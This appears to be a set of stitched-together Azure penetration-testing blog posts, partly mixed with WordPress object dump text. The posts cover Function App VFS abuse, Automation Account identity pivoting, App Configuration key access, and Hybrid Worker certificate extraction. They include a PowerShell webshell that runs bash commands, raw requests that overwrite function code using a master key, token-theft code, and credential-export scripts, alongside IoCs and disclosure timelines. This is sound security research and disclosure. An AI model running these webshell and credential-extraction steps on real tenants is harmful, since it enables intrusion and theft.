"Secrets":{"Host":{"Master":"Q[REDACTED]=","Function":{"default": "k[REDACTED]="}, "System":{}},"Function":[]}}
The important things to highlight here are:
- AzureWebJobsStorage and APPSETTING_AzureWebJobsStorage
- SCM_RUN_FROM_PACKAGE and APPSETTING_SCM_RUN_FROM_PACKAGE
- Function App “Master” and “Default” secrets
It should be noted that the “MICROSOFT_PROVIDER_AUTHENTICATION_SECRET” will also be available if the Function App has been set up to authenticate users via Azure AD. This is an App Registration credential that might be useful for gaining access to the tenant.
While the jobs storage information is a nice way to get access to the Function App Storage Account, we will be more interested in the Function “Master” App Secret, as that can be used to overwrite the functions in the app. By overwriting the functions, we can get full command execution in the container. This would also allow us to gain access to any attached Managed Identities on the Function App.
For our Proof of Concept, we’ll use the baseline PowerShell “hello” function as our template to overwrite:
This basic function just returns the “Name” submitted from a request parameter. For our purposes, we’ll convert this over to a Function App webshell (of sorts) that uses the “Name” parameter as the command to run.
using namespace System.Net

# Input bindings are passed in via param block.
param($Request, $TriggerMetadata)

# Write to the Azure Functions log stream.
Write-Host "PowerShell HTTP trigger function processed a request."

# Interact with query parameters or the body of the request.
$name = $Request.Query.Name
if (-not $name) {
    $name = $Request.Body.Name
}

$body = "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response."

if ($name) {
    $cmdoutput = [string](bash -c $name)
    $body = (-join("Executed Command: ",$name,"`nCommand Output: ",$cmdoutput))
}

# Associate values to output bindings by calling 'Push-OutputBinding'.
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{
    StatusCode = [HttpStatusCode]::OK
    Body = $body
})
To overwrite the function, we will use Burp Suite to send a PUT request with our new code. Before we do that, we need to make an initial request for the function code to get the associated ETag to use with the PUT request.
Initial GET of the Function Code:
GET /admin/vfs/home/site/wwwroot/HttpTrigger1/run.ps1 HTTP/1.1
Host: vfspoc2.azurewebsites.net
x-functions-key: Q[REDACTED]=

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Date: Wed, 21 Sep 2022 23:29:01 GMT
Server: Kestrel
ETag: "38aaebfb279cda08"
Last-Modified: Wed, 21 Sep 2022 23:21:17 GMT
Content-Length: 852

using namespace System.Net
# Input bindings are passed in via param block.
param($Request, $TriggerMetadata)
[Truncated]
})
PUT Overwrite Request Using the ETag as the "If-Match" Header:
PUT /admin/vfs/home/site/wwwroot/HttpTrigger1/run.ps1 HTTP/1.1
Host: vfspoc2.azurewebsites.net
x-functions-key: Q[REDACTED]=
Content-Length: 851
If-Match: "38aaebfb279cda08"

using namespace System.Net
# Input bindings are passed in via param block.
param($Request, $TriggerMetadata)
# Write to the Azure Functions log stream.
Write-Host "PowerShell HTTP trigger function processed a request."
# Interact with query parameters or the body of the request.
$name = $Request.Query.Name
if (-not $name) { $name = $Request.Body.Name }
$body = "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response."
if ($name) {
    $cmdoutput = [string](bash -c $name)
    $body = (-join("Executed Command: ",$name,"`nCommand Output: ",$cmdoutput))
}
# Associate values to output bindings by calling 'Push-OutputBinding'.
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{
    StatusCode = [HttpStatusCode]::OK
    Body = $body
})

HTTP Response:

HTTP/1.1 204 No Content
Date: Wed, 21 Sep 2022 23:32:32 GMT
Server: Kestrel
ETag: "c243578e299cda08"
Last-Modified: Wed, 21 Sep 2022 23:32:32 GMT
The server should respond with a 204 No Content, and an updated ETag for the file. With our newly updated function, we can start executing commands.
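The same GET/PUT flow can also be scripted instead of hand-edited in Burp Suite. A sketch, assuming $masterKey and $newCode (the webshell source) are already populated:

$uri = "https://vfspoc2.azurewebsites.net/admin/vfs/home/site/wwwroot/HttpTrigger1/run.ps1"
$headers = @{ "x-functions-key" = $masterKey }

# GET the current code to capture the ETag for the If-Match header
$resp = Invoke-WebRequest -Uri $uri -Headers $headers
$headers["If-Match"] = $resp.Headers["ETag"]

# Overwrite the function; a 204 response indicates success
Invoke-WebRequest -Uri $uri -Headers $headers -Method Put -Body $newCode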
Sample URL:
https://vfspoc2.azurewebsites.net/api/HttpTrigger1?name=whoami&code=Q[REDACTED]=
Browser Output:
Now that we have full control over the Function App container, we can potentially make use of any attached Managed Identities and generate tokens for them. In our case, we will just add the following PowerShell code to the function to set the output to the management token we’re trying to export.
$resourceURI = "https://management.azure.com" $tokenAuthURI = $env:IDENTITY_ENDPOINT + "?resource= $resourceURI&api-version=2019-08-01" $tokenResponse = Invoke-RestMethod -Method Get -Headers @{"X-IDENTITY-HEADER"="$env:IDENTITY_HEADER"} -Uri $tokenAuthURI $body = $tokenResponse.access_token
Example Token Exported from the Browser:
For more information on taking over Azure Function Apps, check out this fantastic post by Bill Ben Haim and Zur Ulianitzky: 10 ways of gaining control over Azure function Apps.
Conclusion
Let's recap the issue:
- Start as a user with the Reader role on a Function App.
- Abuse the undocumented VFS API to read arbitrary files from the containers.
- Access encryption keys on the Windows containers or access the “proc” files from the Linux Container.
- Using the Linux container, read the process environment variables.
- Use the variables to access configuration information in a SAS token URL.
- Decrypt the configuration information with the variables.
- Use the keys exposed in the configuration information to overwrite the function and gain command execution in the Linux Container.
All this being said, we submitted this issue through MSRC, and they were able to remediate the file access issues. The APIs are still there, so you may be able to get access to some of the Function App container and application files with the appropriate role, but the APIs are now restricted for the Reader role.
MSRC timeline
The initial disclosure for this issue, focusing on Windows containers, was sent to MSRC on Aug 2, 2022. A month later, we discovered the additional impact related to the Linux containers and submitted a secondary ticket, as the impact was significantly higher than initially discovered and the different base container might require a different remediation.
There were a few false starts on the remediation date, but eventually the vulnerable API was restricted for the Reader role on January 17, 2023. On January 24, 2023, Microsoft rolled back the fix after it caused some issues for customers.
On March 6, 2023, Microsoft reimplemented the fix to address the issue. The rollout was completed globally on March 8. At the time of publishing, the Reader role no longer has the ability to read files with the Function App VFS APIs. It should be noted that the Linux escalation path is still a viable option if an attacker has command execution on a Linux Function App.
Intro

Azure Automation Accounts are a frequent topic on the NetSPI technical blog, to the point that we compiled our research into a presentation for the DEFCON 30 cloud village and the Azure Cloud Security Meetup Group. We're always trying to find new ways to leverage Automation Accounts during cloud penetration testing. To automate enumerating our privilege escalation options, we looked at how Automation Accounts handle authenticating as other accounts within a runbook, and how we can abuse those authentication connections to pivot to other Azure resources.
Azure Automation Accounts are a frequent topic on the NetSPI technical blog. To the point that we compiled our research into a presentation for the DEFCON 30 cloud village and the Azure Cloud Security Meetup Group. We're always trying to find new ways to leverage Automation Accounts during cloud penetration testing. To automate enumerating our privilege escalation options, we looked at how Automation Accounts handle authenticating as other accounts within a runbook, and how we can abuse those authentication connections to pivot to other Azure resources.
Passing the Identity in Azure Active Directory
As a primer, an Azure Active Directory (AAD) identity (User, App Registration, or Managed Identity) can have a role (Contributor) on an Automation Account that allows them to modify the account. The Automation Account can have attached identities that allow the account to authenticate to Azure AD as those identities. Once authenticated as the identity, the Automation Account runbook code will then run any Azure commands in the context of the identity. If that Identity has additional (or different) permissions from those of the AAD user that is writing the runbook, the AAD user can abuse those permissions to escalate or move laterally.
Simply put, Contributor on the Automation Account allows an attacker to be any identity attached to the Automation Account. These attached identities can have additional privileges, leading to a privilege escalation for the original Contributor account.
Available Identities for Azure Automation Accounts
There are two types of identities available for Automation Accounts: Run As Accounts and Managed Identities. The Run As Accounts will be deprecated on September 30, 2023, but they have been a source of several issues since they were introduced. When initially created, a Run As Account will be granted the Contributor role on the subscription it is created in.
These accounts are also App Registrations in Azure Active Directory that use certificates for authentication. These certificates can be extracted from Automation Accounts with a runbook and used for gaining access to the Run As Account. This is also helpful for persistence, as App Registrations typically don’t have conditional access restrictions applied.
For more on Azure Privilege Escalation using Managed Identities, check out this blog.
Managed Identities are the currently recommended option for using an execution identity in Automation Account runbooks. Managed Identities can either be system-assigned or user-assigned. System-assigned identities are tied to the resource that they are created for and cannot be shared between resources. User-assigned Managed Identities are a subscription level resource that can be shared across resources, which is handy for situations where resources, like multiple App Services applications, require shared access to a specific resource (Storage Account, Key Vault, etc.). Managed Identities are a more secure option for Automation Account Identities, as their access is temporary and must be generated from the attached resource.
Since Automation Accounts are frequently used to automate actions in multiple subscriptions, they are often granted roles in other subscriptions, or on higher level management groups. As attackers, we like to look for resources in Azure that can allow for pivoting to other parts of an Azure tenant. To help in automating this enumeration of the identity privileges, we put together a PowerShell script.
Automating Privilege Enumeration
The Get-AzAutomationConnectionScope function in MicroBurst is a relatively simple PowerShell script that uses the following logic:
- Get a list of available subscriptions
- For each selected subscription:
  - Get a list of available connections (Run As or Managed Identity)
  - Build the Automation Account runbook to authenticate as the connection, and list available subscriptions and available Key Vaults
  - Upload and run the runbook
  - Retrieve the output and return it
  - Delete the runbook
In general, we are going to create a "malicious" automation runbook that goes through all the available identities in the Automation Account to tell us the available subscriptions and Key Vaults. Since the Key Vaults utilize a secondary access control mechanism (Access Policies), the script will also review the policies for each available Key Vault and report back any that have entries for our current identity. While a Contributor on a Key Vault can change these Access Policies, it is helpful to know which identities already have Key Vault access.
The usage of the script is simple. Just authenticate to the Az PowerShell module (Connect-AzAccount) as a Contributor on an Automation Account and run “Get-AzAutomationConnectionScope”. The verbose flag is very helpful here, as runbooks can take a while to run, and the verbose status update is nice.
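Concretely, that boils down to something like the following sketch (the module import path assumes a local clone of the MicroBurst repo):

Import-Module .\MicroBurst.psm1
Connect-AzAccount    # authenticate as a Contributor on the Automation Account
Get-AzAutomationConnectionScope -Verbose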
Note that this will also work for cross-tenant Run As connections. As a proof of concept, we created a Run As account in another tenant (see “Automation Account Connection – dso” above), uploaded the certificate and authentication information (Application ID and Tenant) to our Automation Account, and the connection was usable with this script. This can be a convenient way to pivot to other tenants that your Automation Account is responsible for. That said, it's rare for us to see a cross-tenant connection like that.
As a final note, the "Classic Run As" connections in older Automation Accounts will not work with this script. They may show up in your output, but they require additional authentication logic in the runbook, and given the low likelihood of their usage, we've opted not to add that logic for those connections.
Indicators of Compromise
To help out the Azure defenders, here is a rough outline of how this script's activity would look in a subscription/tenant from an incident response perspective:
- Initial Account Authentication
a. User/App Registration authenticates via the Az PowerShell cmdlets
- Subscriptions / Automation Accounts Enumerated
a. The script has you select an available subscription to test, then lists the available Automation Accounts to select from
- Malicious Runbook draft is created in the Automation Account
a. Microsoft.Automation/automationAccounts/runbooks/write
b. Microsoft.Automation/automationAccounts/runbooks/draft/write
- Malicious Runbook is published to the Automation Account
a. Microsoft.Automation/automationAccounts/runbooks/publish/action
- Malicious Runbook is executed as a job
a. Microsoft.Automation/automationAccounts/jobs/write
- Run As connections and/or Managed Identities should show up as authentication events
- Malicious Runbook is deleted from the Automation Account
a. Microsoft.Automation/automationAccounts/runbooks/delete
Providing the full rundown is a little beyond the scope of this blog, but Lina Lau (@inversecos) has a great blog on detections for Automation Accounts that covers a persistence technique I outlined in a previous article, Maintaining Azure Persistence via Automation Accounts. Lina’s blog should also cover most of the steps that we have outlined above.
For additional detail on Automation Account attack paths, take a look at Andy Robbins’ blog, Managed Identity Attack Paths, Part 1: Automation Accounts.
Conclusion
While Automation Account identities are often a necessity for automating actions in an Azure tenant, they can allow a user (with the correct role) to abuse the identity permissions to escalate and/or pivot to other subscriptions.
The function outlined in this blog should be helpful for enumerating potential pivot points from an existing Automation Account where you have Contributor access. From here, you could create custom runbooks to extract credentials, or pivot to Virtual Machines that your identity has access to. Alternatively, defenders can use this script to see the potential blast radius of a compromised Automation Account in their subscriptions.
Ready to improve your Azure security? Explore NetSPI’s Azure Cloud Penetration Testing solutions. Or checkout these blog posts for more in-depth research on Azure Automation Accounts:
- Get-AzurePasswords: Exporting Azure RunAs Certificates for Persistence
- Using Azure Automation Accounts to Access Key Vaults
- Escalating Azure Privileges with the Log Analytics Contributor Role
- CVE-2021-42306 CredManifest: App Registration Certificates Stored in Azure Active Directory
Most Azure environments that we test contain multiple kinds of application hosting services (App Services, AKS, etc.). As these applications grow and scale, we often find that the application configuration parameters will be shared between the multiple apps. To help with this scaling challenge, Microsoft offers the Azure App Configuration service. The service allows Azure users to create key-value pairs that can be shared across multiple application resources. In theory, this is a great way to share non-sensitive configuration values across resources. In practice, we see these configurations expose sensitive information to users with permission to read the values.
TL;DR
The Azure App Configuration service can often hold sensitive data values. This blog post outlines gathering and using access keys for the service to retrieve the configuration values.
What are App Configurations?
The App Configuration service is a very simple service. Provide an Id and Secret to an “azconfig.io” endpoint and get back a list of key-value pairs that integrate into your application environment. This is a really simple way to share configuration information across multiple applications, but we have frequently found sensitive information (keys, passwords, connection strings) in these configuration values. This is a known problem, as Microsoft specifically calls out secret storage in their documentation, noting Key Vaults as the recommended secure solution.
Gathering Access Keys
Within the App Configuration service, two kinds of access keys (Read-write and Read-only) can be used for accessing the service and the configuration values. Additionally, Read-write keys allow you to change the stored values, so access to these keys could allow for additional attacks on applications that take action on these values. For example, by modifying a stored value for an “SMBSHAREHOST” parameter, we might be able to force an application to initiate an SMB connection to a host that we control. This is just one example, but depending on how these values are utilized, there is potential for further attacks.
Regardless of the type of key that an attacker acquires, either one can lead to access to the configuration values. Much like the other key-based authentication services in Azure, you are also able to regenerate these keys. This is particularly useful if your keys are ever unintentionally exposed.
To read these keys, you will need Contributor role access to the resource or access to a role with the “Microsoft.AppConfiguration/configurationStores/ListKeys/” action.
From the portal, you can copy out the connection string directly from the “Access keys” menu.
This connection string will contain the Endpoint, Id, and Secret, which can all be used together to access the service.
Alternatively, using the Az PowerShell cmdlets, we can list out the available App Configurations (Get-AzAppConfigurationStore) and for each configuration store, we can get the keys (Get-AzAppConfigurationStoreKey). This process is also automated by the Get-AzPasswords function in MicroBurst with the “AppConfiguration” flag.
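A quick sketch of that enumeration with the Az cmdlets named above (the resource group is parsed out of each store's resource Id):

# List every App Configuration store in the current subscription, then dump its access keys
Get-AzAppConfigurationStore | ForEach-Object {
    $rg = ($_.Id -split '/')[4]
    Get-AzAppConfigurationStoreKey -Name $_.Name -ResourceGroupName $rg
}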
Finally, if you don’t have initial access to an Azure subscription to collect these access keys, we have found App Configuration connection strings in web applications (via directory traversal/local file include attacks) and in public GitHub repositories. A cursory search of public data sources results in a fair number of hits, so there are a few access keys floating around out there.
Using the Keys
Typically, these connection strings are tied to an application environment, so the code environment makes the calls out to Azure to gather the configurations. When initially looking into this service, we used a Microsoft Learn example application with our connection string and proxied the application traffic to look at the request out to azconfig.io.
This initial look into the azconfig.io API calls showed that we needed to use the Id and Secret to sign the requests with a SHA256-HMAC signature. Conveniently, Microsoft provides documentation on how we can do this. Using this sample code, we added a new function to MicroBurst to make it easier to request these configurations.
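For reference, a rough PowerShell sketch of that signing scheme, based on the Microsoft documentation ($endpoint, $id, and $secret are parsed from a connection string; the /kv route lists the key-values):

$uri  = "$endpoint/kv?api-version=1.0"
$date = [DateTime]::UtcNow.ToString("R")

# SHA256 hash of the (empty) request body, Base64 encoded
$contentHash = [Convert]::ToBase64String([System.Security.Cryptography.SHA256]::Create().ComputeHash([byte[]]@()))

# Sign "METHOD\nPathAndQuery\ndate;host;hash" with the Base64-decoded secret
$stringToSign = "GET`n$(([Uri]$uri).PathAndQuery)`n$date;$(([Uri]$uri).Host);$contentHash"
$hmac = New-Object System.Security.Cryptography.HMACSHA256(,[Convert]::FromBase64String($secret))
$signature = [Convert]::ToBase64String($hmac.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($stringToSign)))

Invoke-RestMethod -Uri $uri -Headers @{
    "x-ms-date"           = $date
    "x-ms-content-sha256" = $contentHash
    "Authorization"       = "HMAC-SHA256 Credential=$id&SignedHeaders=x-ms-date;host;x-ms-content-sha256&Signature=$signature"
}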
The Get-AzAppConfiguration function (in the “Misc” folder) can be used with the connection string to dump all the configuration values from an App Configuration.
In our example, I just have “test” values for the keys. As noted above, if you have the Read-write key for the App Configuration, you will be able to modify the values of any of the keys that are not set to “locked”. Depending on how these configuration values are interpreted by the application, this could lead to some pivoting opportunities.
IoCs
Since we just provided some potential attack options, we also wanted to call out any IoCs that you can use to detect an attacker going after your App Configurations:
- Azure Activity Log - List Access Keys
- Category – “Administrative”
- Action – “Microsoft.AppConfiguration/configurationStores/ListKeys/action”
- Status – “Started”
- Caller – < UPN of account listing keys>
- App Configuration Service Logs
- Application Configuration audit logs capture the key used to access App Configuration data as part of the “RequestURI” string in the diagnostic table of the app service. Where Azure AD authentication is used to control access to App Configuration data, the audit logs capture the details of the account used to access the data.
Conclusions
We showed you how to gather access keys for App Configuration resources and how to use those keys to access the configuration key-value pairs. This will hopefully give Azure pentesters something to work with if they run into an App Configuration connection string, and give defenders areas to look at to help secure their configuration environments.
For those using Azure App Configurations, make sure that you are not storing any sensitive information within your configuration values. Key Vaults are a much better solution for this and will give you additional protections (Access Policies and logging) that you don’t have with App Configurations. Finally, you can also disable access key authentication for the service and rely on Azure Active Directory (AAD) for authentication. Depending on the configuration of your environment, this may be a more secure configuration option.
Need help testing your Azure app configurations? Explore NetSPI’s Azure cloud penetration testing.
Abusing Azure Hybrid Workers for Privilege Escalation – Part 1

On the NetSPI blog, we often focus on Azure Automation Accounts. They offer a fair amount of attack surface area during cloud penetration tests and are a great source for privilege escalation opportunities.
During one of our recent Azure penetration testing assessments, we ran into an environment that was using Automation Account Hybrid Workers to run automation runbooks on virtual machines. Hybrid Workers are an alternative to the traditional Azure Automation Account container environment for runbook execution. Outside of the “normal” runbook execution environment, automation runbooks need access to additional credentials to interact with Azure resources. This can lead to a potential privilege escalation scenario that we will cover in this blog.
TL;DR
Azure Hybrid Workers can be configured to use Automation Account “Run as” accounts, which can expose the credentials to anyone with local administrator access to the Hybrid Worker. Since “Run as” accounts are typically subscription contributors, this can lead to privilege escalation from multiple Azure Role-Based Access Control (RBAC) roles.
What are Azure Hybrid Workers?
For those that need more computing resources (CPU, RAM, Disk, Time) to run their Automation Account runbooks, there is an option to add Hybrid Workers to an Automation Account. These Hybrid Workers can be Azure Virtual Machines (VMs) or Arc-enabled servers, and they allow for additional computing flexibility over the normal limitations of the Automation Account hosted environment. Typically, I’ve seen Hybrid Workers as Windows-based Azure VMs, as that’s the easiest way to integrate with the Automation Account runbooks.
In this article, we’re going to focus on instances where the Hybrid Workers are Windows VMs in Azure. They’re the most common configuration that we run into, and the Linux VMs in Azure can’t be configured to use the “Run as” certificates, which are the target of this blog.
The easiest way to identify Automation Accounts that use Hybrid Workers is to look at the “Hybrid worker groups” section of an Automation Account in the portal. We will be focusing on the “User” groups, versus the “System” groups for this post.
Additionally, you can use the Az PowerShell cmdlets to identify the Hybrid Worker groups, or you can enumerate the VMs that have the “HybridWorkerExtension” VM extension installed. I’ve found this last method is the most reliable for finding potentially vulnerable VMs to attack.
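A sketch of that last enumeration method with the Az cmdlets (the extension name match is an assumption; adjust as needed):

# Flag running VMs that have a Hybrid Worker extension installed
Get-AzVM -Status | Where-Object { $_.PowerState -eq "VM running" } | ForEach-Object {
    $ext = Get-AzVMExtension -ResourceGroupName $_.ResourceGroupName -VMName $_.Name
    if ($ext | Where-Object { $_.Name -like "*HybridWorker*" }) { $_.Name }
}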
Additional Azure Automation Accounts Research:
- Get-AzurePasswords: Exporting Azure RunAs Certificates for Persistence
- Using Azure Automation Accounts to Access Key Vaults
- Escalating Azure Privileges with the Log Analytics Contributor Role
- CVE-2021-42306 CredManifest: App Registration Certificates Stored in Azure Active Directory
Running Jobs on the Workers
To run jobs on the Hybrid Worker group, you can modify the “Run settings” in any of your runbook execution options (Schedules, Webhook, Test Pane) to “Run on” the Hybrid Worker group.
When the runbook code is executed on the Hybrid Worker, it is run as the “NT AUTHORITY\SYSTEM” account in Windows, or “root” in Linux. If an Azure AD user has a role (Automation Contributor) with Automation Account permissions, and no VM permissions, this could allow them to gain privileged access to VMs.
We will go over this in greater detail in part two of this blog, but Hybrid Workers utilize an undocumented internal API to poll for information about the Automation Account (Runbooks, Credentials, Jobs). As part of this, the Hybrid Workers are not supposed to have direct access to the certificates that are used as part of the traditional “Run As” process. As you will see in the following blog, this isn’t totally true.
To make up for the lack of immediate access to the “Run as” credentials, Microsoft recommends exporting the “Run as” certificate from the Automation Account and installing it on each Hybrid Worker in the group of workers. Once installed, the “Run as” credential can then be referenced by the runbook, to authenticate as the app registration.
If you have access to an Automation Account, keep an eye out for any lingering “Export-RunAsCertificateToHybridWorker” runbooks that may indicate the usage of the “Run as” certificates on the Hybrid Workers.
The issue with installing these “Run As” certificates on the Hybrid Workers is that anyone with local administrator access to the Hybrid Worker can extract the credential and use it to authenticate as the “Run as” account. Given that “Run as” accounts are typically configured with the Contributor role at the subscription scope, this could result in privilege escalation.
Extracting “Run As” Credentials from Hybrid Workers
We have two different ways of accessing Windows VMs in Azure, direct authentication (Local or Domain accounts) and platform level command execution (VM Run Command in Azure). Since there are a million different ways that someone could gain access to credentials with local administrator rights, we won’t be covering standard Windows authentication. Instead, we will briefly cover the multiple Azure RBAC roles that allow for various ways of command execution on Azure VMs.
Affected Roles:
- Virtual Machine Contributor
  - Run Command Rights
  - VM Extension Rights
- Virtual Machine Administrator Login
  - "Log in to a virtual machine with Windows administrator or Linux root user privileges"
- Log Analytics Contributor
  - VM Extension Rights
  - Previously covered in this blog
- Virtual Machine User Login
  - May have rights to log in and access the “Run as” PFX file left over in C:\Windows\Temp
- Azure Connected Machine Onboarding
  - Can add new ARC machines, which may get the “Run as” certificate installed
- Azure Connected Machine Resource Administrator
  - Can add new ARC machines, which may get the “Run as” certificate installed
- Azure ARC Extension Rights
  - Can add new ARC machines, which may get the “Run as” certificate installed
Where noted above (VM Extension Rights), the VM Extension command execution method comes from the following NetSPI blog: Attacking Azure with Custom Script Extensions.
Since the above roles are not the full Contributor role on the subscription, it is possible for someone with one of the above roles to extract the “Run as” credentials from the VM (see below) to escalate to a subscription Contributor. This is a somewhat similar escalation path to the one that we previously called out for the Log Analytics Contributor role.
Exporting the Certificate from the Worker
As a local administrator on the Hybrid Worker VM, it’s fairly simple to export the certificate. With Remote Desktop Protocol (RDP) access, we can just manually go into the certificate manager (certmgr), find the “Run as” certificate, and export it to a pfx file.
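The same export can be done from a PowerShell session as a local administrator. A rough sketch (the password and output path are arbitrary placeholders, and this only succeeds for keys marked exportable):

# Export any exportable private certs from the local machine store to PFX files
$pass = ConvertTo-SecureString -String "PLACEHOLDER_PASSWORD" -AsPlainText -Force
Get-ChildItem Cert:\LocalMachine\My | Where-Object { $_.HasPrivateKey } | ForEach-Object {
    Export-PfxCertificate -Cert $_ -FilePath "C:\Temp\$($_.Thumbprint).pfx" -Password $pass
}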
At this point we can copy the file from the Hybrid Worker to use for authentication on another system. Since this is a bit tedious to do at scale, we’ve automated the whole process with a PowerShell script.
Automating the Process
The following script is in the MicroBurst repository under the “Az” folder:
https://github.com/NetSPI/MicroBurst/blob/master/Az/Invoke-AzHybridWorkerExtraction.ps1
This script will enumerate any running Windows virtual machines configured with the Hybrid Worker extension and will then run commands on the VMs (via Invoke-AzVMRunCommand) to export the available private certificates. Assuming the Hybrid Worker is only configured with one exportable private certificate, this will return the certificate as a Base64 string in the run command output.
PS C:\temp\hybrid> Invoke-AzHybridWorkerExtraction -Verbose
VERBOSE: Logged In as kfosaaen@notarealdomain.com
VERBOSE: Getting a list of Hybrid Worker VMs
VERBOSE: Running extraction script on the HWTest virtual machine
VERBOSE: Looking for the attached App Registration... This may take a while in larger environments
VERBOSE: Writing the AuthAs script
VERBOSE: Use the C:\temp\HybridWorkers\AuthAsNetSPI_tester_[REDACTED].ps1 script to authenticate as the NetSPI_sQ[REDACTED]g= App Registration
VERBOSE: Script Execution on HWTest Completed
VERBOSE: Run as Credential Dumping Activities Have Completed
The script will then write this Base64 certificate data to a file and use the resulting certificate thumbprint to match against App Registration credentials in Azure AD. This will allow the script to find the App Registration Client ID that is needed to authenticate with the exported certificate.
Finally, this will create an “AuthAs” script (noted in the output) that can be used to authenticate as the “Run as” account, with the exported private certificate.
PS C:\temp\hybrid> ls | select Name, Length

Name                                      Length
----                                      ------
AuthAsNetSPI_tester_[Redacted_Sub_ID].ps1   1018
NetSPI_tester_[Redacted_Sub_ID].pfx         2615
This script can be run with any RBAC role that has VM “Run Command” rights on the Hybrid Workers to extract out the “Run as” credentials.
Authenticating as the “Run As” Account
Now that we have the certificate, we can use the generated script to authenticate to the subscription as the “Run As” account. This is very similar to what we do with exporting credentials in the Get-AzPasswords function, so this may look familiar.
PS C:\temp\hybrid> .\AuthAsNetSPI_tester_[Redacted_Sub_ID].ps1

   PSParentPath: Microsoft.PowerShell.Security\Certificate::LocalMachine\My

Thumbprint                                Subject
----------                                -------
BDD023EC342FE04CC1C0613499F9FF63111631BB  DC=NetSPI_tester_[Redacted_Sub_ID]

Environments : {[AzureChinaCloud, AzureChinaCloud], [AzureCloud, AzureCloud], [AzureGermanCloud, AzureGermanCloud], [AzureUSGovernment, AzureUSGovernment]}
Context      : Microsoft.Azure.Commands.Profile.Models.Core.PSAzureContext

PS C:\temp\hybrid> (Get-AzContext).Account

Id                    : 52[REDACTED]57
Type                  : ServicePrincipal
Tenants               : {47[REDACTED]35}
Credential            :
TenantMap             : {}
CertificateThumbprint : BDD023EC342FE04CC1C0613499F9FF63111631BB
ExtendedProperties    : {[Subscriptions, d4[REDACTED]b2], [Tenants, 47[REDACTED]35], [CertificateThumbprint, BDD023EC342FE04CC1C0613499F9FF63111631BB]}
Alternative Options
Finally, any user with the ability to run commands as “NT AUTHORITY\SYSTEM” on the Hybrid Workers is also able to assume the authenticated Azure context that results from authenticating (Connect-AzAccount) to Azure while running a job as a Hybrid Worker.
This would result in users being able to run Az PowerShell module functions as the “Run as” account via the Azure “Run command” and “Extension” features that are available to many of the roles listed above. Assuming the “Connect-AzAccount” function was previously used with a runbook, an attacker could just use the run command feature to run other Az module functions with the “Run as” context.
Additionally, since the certificate is installed on the VM, a user could just use the certificate to directly authenticate from the Hybrid Worker, if there was no active login context.
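For reference, direct authentication with an installed certificate is a one-liner with the Az module ($appId and $tenantId are the App Registration client and tenant IDs tied to the certificate):

# Authenticate as the "Run as" App Registration using the installed certificate
Connect-AzAccount -ServicePrincipal -ApplicationId $appId -Tenant $tenantId -CertificateThumbprint "BDD023EC342FE04CC1C0613499F9FF63111631BB"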
Summary
In conjunction with the issues outlined in part two of this blog, we submitted our findings to MSRC.
Since this issue ultimately relies on an Azure administrator giving a user access to specific VMs (the Hybrid Workers), it’s considered a user misconfiguration issue. Microsoft has updated their documentation to reflect the potential impact of installing the “Run as” certificate on the VMs. You could also modify the certificate installation process to mark the certificates as “non-exportable” to help protect them.
We would recommend against using “Run as” accounts for Automation Accounts and instead switch to using managed identities on the Hybrid Worker VMs.
Stay tuned to the NetSPI technical blog for the second half of this series that will outline how we were able to use a Reader role account to extract credentials and certificates from Automation Accounts. In subscriptions where Run As accounts were in use, this resulted in a Reader to Contributor privilege escalation.
Prior Work
While we were working on these blogs, the Azsec blog published the “Laterally move by abusing Log Analytics Agent and Automation Hybrid worker” post, which covers some techniques similar to those above. Read the post to see how they make use of Log Analytics to gain access to the Hybrid Worker groups.
[post_title] => Abusing Azure Hybrid Workers for Privilege Escalation – Part 1 [post_excerpt] => In this cloud penetration testing blog, learn how to abuse Azure Hybrid Workers for privilege escalation. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => abusing-azure-hybrid-workers-for-privilege-escalation [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:20:54 [post_modified_gmt] => 2023-03-16 14:20:54 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27487 [menu_order] => 295 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [11] => WP_Post Object ( [ID] => 27255 [post_author] => 10 [post_date] => 2022-01-27 09:00:00 [post_date_gmt] => 2022-01-27 15:00:00 [post_content] =>As more applications move to a container-based model, we are running into more instances of Azure Kubernetes Services (AKS) being used in Azure subscriptions. The service itself can be complicated and have a large attack surface area. In this post we will focus on how to extract credentials from the AKS service in Azure, using the Contributor role permissions on an AKS cluster.
While we won’t explain how Kubernetes works, we will use some common terms throughout this post. It may be helpful to have this Kubernetes glossary open in another tab for reference. Additionally, we will not cover how to collect the Kubernetes “Secrets” from the service or how to review pods/containers for sensitive information. We’ll save those topics for a future post.
What is Azure Kubernetes Service (AKS)?
In the simplest terms, the AKS service is an Azure resource that allows you to run a Kubernetes cluster in Azure. When created, the AKS cluster resource consists of sub-resources (in a special resource group) that support running the cluster. These sub-resources, and attached cluster, allow you to orchestrate containers and set up Kubernetes workloads. As a part of the orchestration process, the cluster needs to be assigned an identity (a Service Principal or a Managed Identity) in the Azure tenant.
Service Principal versus Managed Identity
When provisioning an AKS cluster, you will have to choose between authenticating with a Service Principal or a System-assigned Managed Identity. By default, the Service Principal that is assigned to the cluster will get the ACRPull role assigned at the subscription scope level. While it’s not guaranteed, an existing Service Principal may also have additional roles already assigned in the Azure tenant.
In contrast, a newly created System-assigned Managed Identity on an AKS cluster will not have any assigned roles in a subscription. To further complicate things, the “System-assigned” Managed Identity is actually a “User-assigned” Managed Identity that’s created in the new Resource Group for the Virtual Machine Scale Set (VMSS) cluster resources. There’s no “Identity” menu in the AKS portal blade, so it’s my understanding that the User-assigned Managed Identity is what gets used in the cluster. Each of these authentication methods has its benefits, and we will have different approaches to attacking each one.
In order to access the credentials (Service Principal or Managed Identity) associated with the cluster, we will need to execute commands on the cluster. This can be done by using an authenticated kubectl session (which we will explore in the Gathering kubectl Credentials section), or by executing commands directly on the VMSS instances that support the cluster.
When a new cluster is created in AKS, a new resource group is created in the subscription to house the supporting resources. This new resource group is named after the resource group that the AKS resource was created under, and the name of the cluster.
For example, a cluster named “testCluster” that was deployed in the East US region and in the “tester” resource group would have a new resource group that was created named “MC_tester_testCluster_eastus”.
This resource group will contain the VMSS, some supporting resources, and the Managed Identities used by the cluster.
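As a quick illustration of the naming convention in PowerShell (values taken from the example above):

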